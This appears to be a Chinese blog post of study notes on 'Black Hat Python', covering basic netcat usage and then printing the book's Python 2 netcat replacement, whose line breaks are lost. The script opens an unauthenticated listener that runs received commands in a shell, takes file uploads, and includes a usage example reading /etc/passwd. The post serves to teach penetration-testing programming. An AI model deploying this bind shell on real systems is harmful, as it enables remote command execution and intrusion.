netcat是个计算机网络公用程式,用来对网络连线TCP或者UDP进行读写。
透过端口3333(-l 监听状态listen)从机器foo复制到机器bar复制档案:
user@bar$ nc -l -p 3333 > backup.iso
user@foo$ nc bar 3333 < backup.iso
在端口25建立内容未加工过的连接(类似telnet):
nc 25
利用零模式I/O(参数 -z)检查192.168.0.1的UDP端口(参数 -u)80-90是否开启:
nc -vzu 192.168.0.1 80-90
贴下代码,我自己跟着书上写的过程遇到的问题,就是缩进没对齐,导致整个程序后面出错了。由于代码比较长,找起来比较花时间,于是就在网上用了别人敲好的,运行出书上的结果了。
#!/usr/bin/env python2.7import sysimport socketimport getoptimport threadingimport subprocess# define some global variableslisten = Falsecommand = Falseupload = Falseexecute = ""target = ""upload_destination = ""port= 0# this runs a command and returns the outputdef run_command(command):# trim the newlinecommand = command.rstrip()# run the command and get the output backtry:output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)except:output = "Failed to execute command.\r\n"# send the output back to the clientreturn output# this handles incoming client connectionsdef client_handler(client_socket):global uploadglobal executeglobal command# check for uploadif len(upload_destination):# read in all of the bytes and write to our destinationfile_buffer = ""# keep reading data until none is availablewhile True:data = client_socket.recv(1024)if not data:breakelse:file_buffer += data# now we take these bytes and try to write them outtry:file_descriptor = open(upload_destination,"wb")file_descriptor.write(file_buffer)file_descriptor.close()# acknowledge that we wrote the file outclient_socket.send("Successfully saved file to %s\r\n" % upload_destination)except:client_socket.send("Failed to save file to %s\r\n" % upload_destination)# check for command executionif len(execute):# run the commandoutput = run_command(execute)client_socket.send(output)# now we go into another loop if a command shell was requestedif command:while True:# show a simple promptclient_socket.send("<BHP:#> ")# now we receive until we see a linefeed (enter key)cmd_buffer = ""while "\n" not in cmd_buffer:cmd_buffer += client_socket.recv(1024)# we have a valid command so execute it and send back the resultsresponse = run_command(cmd_buffer)# send back the responseclient_socket.send(response)# this is for incoming connectionsdef server_loop():global targetglobal port# if no target is defined we listen on all interfacesif not len(target):target = "0.0.0.0"server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.bind((target,port))server.listen(5) while True:client_socket, addr = server.accept()# spin off a thread to handle our new clientclient_thread = threading.Thread(target=client_handler,args=(client_socket,))client_thread.start()# if we don't listen we are a client....make it so.def client_sender(buffer):client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:# connect to our target hostclient.connect((target,port))# if we detect input from stdin send it # if not we are going to wait for the user to punch some inif len(buffer):client.send(buffer)while True:# now wait for data backrecv_len = 1response = ""while recv_len:data= client.recv(4096)recv_len = len(data)response+= dataif recv_len < 4096:breakprint response, # wait for more inputbuffer = raw_input("")buffer += "\n" # send it offclient.send(buffer)except:# just catch generic errors - you can do your homework to beef this upprint "[*] Exception! Exiting."# teardown the connection client.close() def usage():print "Netcat Replacement"printprint "Usage: bhpnet.py -t target_host -p port"print "-l --listen- listen on [host]:[port] for incoming connections"print "-e --execute=file_to_run - execute the given file upon receiving a connection"print "-c --command- initialize a command shell"print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"printprintprint "Examples: "print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"sys.exit(0)def main():global listenglobal portglobal executeglobal commandglobal upload_destinationglobal targetif not len(sys.argv[1:]):usage()# read the commandline optionstry:opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])except getopt.GetoptError as err:print str(err)usage()for o,a in opts:if o in ("-h","--help"):usage()elif o in ("-l","--listen"):listen = Trueelif o in ("-e", "--execute"):execute = aelif o in ("-c", "--commandshell"):command = Trueelif o in ("-u", "--upload"):upload_destination = aelif o in ("-t", "--target"):target = aelif o in ("-p", "--port"):port = int(a)else:assert False,"Unhandled Option"# are we going to listen or just send data from stdinif not listen and len(target) and port > 0:# read in the buffer from the commandline# this will block, so send CTRL-D if not sending input# to stdinbuffer = sys.stdin.read()# send data offclient_sender(buffer) # we are going to listen and potentially # upload things, execute commands and drop a shell back# depending on our command line options aboveif listen:server_loop()main()
运行情况:
在一个终端中输入:
root@kali:~# ./bhnet.py -l -p 9999 -c
按回车之后什么都没有显示,它已经在监听了。接下来打开一个新的终端,输入:
root@kali:~# ./bhnet.py -t localhost -p 9999
接下来还是没反应,接着按住ctrl+d键,就会如图所示:
接着输入:
会显示文件数及它们的属性。
再输入别的命令试试:
pwd命令 Linux中用 pwd 命令来查看”当前工作目录“的完整路径。
可以看到,我们返回了典型的命令行shell,由于我们在一个UNIX主机上,所以可以运行一些本地命令并回传其输出,就好像我们通过SSH登录一样,或者像是在目标主机本地运行。我们可以使用老派的方式直接利用客户端发送HTTP请求:
root@kali:~# echo -ne "GET / HTTP/1.1\r\nHost: \r\n\r\n" | ./bhnet.py -t -p 80
如果觉得《Python黑帽子 黑客与渗透测试编程之道(三)取代netcat》对你有帮助,请点赞、收藏,并留下你的观点哦!
